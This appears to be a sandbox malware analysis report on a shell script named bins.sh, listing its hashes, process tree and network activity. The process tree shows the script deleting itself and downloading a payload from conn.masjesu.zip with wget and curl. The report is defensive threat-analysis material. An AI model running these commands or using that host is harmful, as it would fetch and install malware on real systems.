Analysis

  • max time kernel
    148s
  • max time network
    129s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240508-en
  • resource tags

    arch:amd64 arch:i386 image:ubuntu1804-amd64-20240508-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system
  • submitted
    04/01/2025, 20:07 UTC

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    942d94d9683731e7c0e80fb1184455c6

  • SHA1

    bcb4bc2b172dd258e1864c02f6e19b3a35b0d610

  • SHA256

    67e889a87756f6c3c9efbbe222582538a388eb437b8b98840566a49576b776d8

  • SHA512

    58c5eb1e3024d4d713047c5b02ace9a829c3161d260ca04e126f21e93e40fb990dbc3fd0b4235210b994411f852fac2dffe07daac1ab029f7b62f8c087fec9d0

  • SSDEEP

    96:Y/T/v/UJJFSqhLzP4LRJLfh1hVhWxt3UDfUjgjcjf8cpaSzTv1koCLHbIi6loooE:nY1b7Wxt3uTJlEn3ncb7WxtiJlEn3Z

Score
3/10

Malware Config

Signatures

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:1516
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:1517
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/3NOGXxXh3PKsA8UjthzWQcC5CuyqMFfu9h
          2⤵
          • System Network Configuration Discovery
          PID:1518
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/3NOGXxXh3PKsA8UjthzWQcC5CuyqMFfu9h
          2⤵
          • System Network Configuration Discovery
          PID:1519

      Network

      • flag-us
        DNS
        conn.masjesu.zip
        Remote address:
        1.1.1.1:53
        Request
        conn.masjesu.zip
        IN A
        Response
        conn.masjesu.zip
        IN A
        66.63.187.225
        conn.masjesu.zip
        IN A
        146.19.162.73
      • flag-us
        DNS
        conn.masjesu.zip
        Remote address:
        1.1.1.1:53
        Request
        conn.masjesu.zip
        IN AAAA
        Response
      • 185.125.188.61:443
        tls
        135 B
        2
      • 185.125.188.61:443
        tls
        135 B
        2
      • 151.101.1.91:443
        tls, https
        233 B
        40 B
        1
        1
      • 151.101.1.91:443
        extensions.gnome.org
        tls
        1.1kB
        5.8kB
        14
        14
      • 89.187.167.3:443
        tls, https
        8.2kB
        33
      • 1.1.1.1:53
        conn.masjesu.zip
        dns
        73 B
        105 B
        1
        1

        DNS Request

        conn.masjesu.zip

        DNS Response

        66.63.187.225
        146.19.162.73

      • 1.1.1.1:53
        conn.masjesu.zip
        dns
        73 B
        136 B
        1
        1

        DNS Request

        conn.masjesu.zip

      • 224.0.0.251:5353
        146 B
        2

      MITRE ATT&CK Enterprise v15

      Downloads